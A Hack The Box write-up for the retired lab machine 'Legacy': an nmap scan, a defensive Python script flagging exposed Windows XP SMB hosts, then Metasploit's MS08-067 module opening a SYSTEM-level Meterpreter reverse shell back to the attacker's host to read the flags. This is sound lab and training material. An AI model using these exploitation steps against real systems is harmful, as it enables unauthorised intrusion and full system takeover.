HTB: Legacy – Writeup

Details

This machine is Legacy from Hack The Box; it is now retired. Its IP was 10.10.10.4.

Recon Phase

Start by looking for exposed services with a version scan:

root@kali:~# nmap -T4 -sV 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-09 23:49 GMT
Nmap scan report for 10.10.10.4
Host is up (0.034s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.74 seconds
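From a defender's side the scan above already tells the story: an out-of-support Windows XP host exposing SMB on 445 is an MS08-067 candidate. The Python below is an added illustration, not part of the original writeup: it parses nmap's normal output (the sample is constructed from the scan above) and flags such hosts for patching and isolation.

```python
import re

# Constructed sample, modelled on the nmap -sV output of the scan above.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.4
Host is up (0.034s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap(text):
    """Parse nmap normal output into {host: {"ports": [...], "os": str}}."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = hosts.setdefault(m.group(1), {"ports": [], "os": ""})
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            current["ports"].append({"port": int(m.group(1)), "proto": m.group(2),
                                     "state": m.group(3), "service": m.group(4),
                                     "version": m.group(5)})
        elif line.startswith("Service Info:"):
            current["os"] = line  # keep the OS guess for the banner check below
    return hosts

def assess(hosts):
    """Return (host, severity, message) for hosts exposing SMB; XP hosts rate HIGH."""
    findings = []
    for host, info in hosts.items():
        smb = [p for p in info["ports"] if p["port"] == 445 and p["state"] == "open"]
        banners = " ".join(p["version"] for p in smb) + " " + info["os"]
        if smb and "Windows XP" in banners:
            findings.append((host, "HIGH", "Windows XP exposing SMB/445: end of life; "
                             "confirm MS08-067 (KB958644) is applied and isolate the host"))
        elif smb:
            findings.append((host, "MEDIUM", "SMB/445 exposed: verify patch level and "
                             "restrict 445 to management networks"))
    return findings

if __name__ == "__main__":
    for host, severity, msg in assess(parse_nmap(SAMPLE_SCAN)):
        print(f"{host} [{severity}] {msg}")
```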

Takeover

A quick Google search for Windows XP with SMB exposed led me to MS08-067 (the Server Service vulnerability the ms08_067_netapi module targets), and although I'm normally against Metasploit, this time it was worth it.

root@kali:~# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > options
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 10.10.10.4
RHOST => 10.10.10.4
msf exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.14.11:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.11:4444 -> 10.10.10.4:1034) at 2019-02-10 00:29:03 +0000
meterpreter >

And that's a Meterpreter shell.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

It's already SYSTEM, so there is no privilege escalation to do; just grab the flags.

meterpreter > pwd
C:\documents and settings\john\Desktop
meterpreter > dir
Listing: C:\documents and settings\john\Desktop
===============================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 06:19:49 +0000  user.txt
meterpreter > cat user.txt
[REDACTED]

Now for the system flag:

meterpreter > cd '\Documents and Settings\Administrator\Desktop'
meterpreter > dir
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 06:18:50 +0000  root.txt
meterpreter > cat root.txt
[REDACTED]

Well… that was easy…
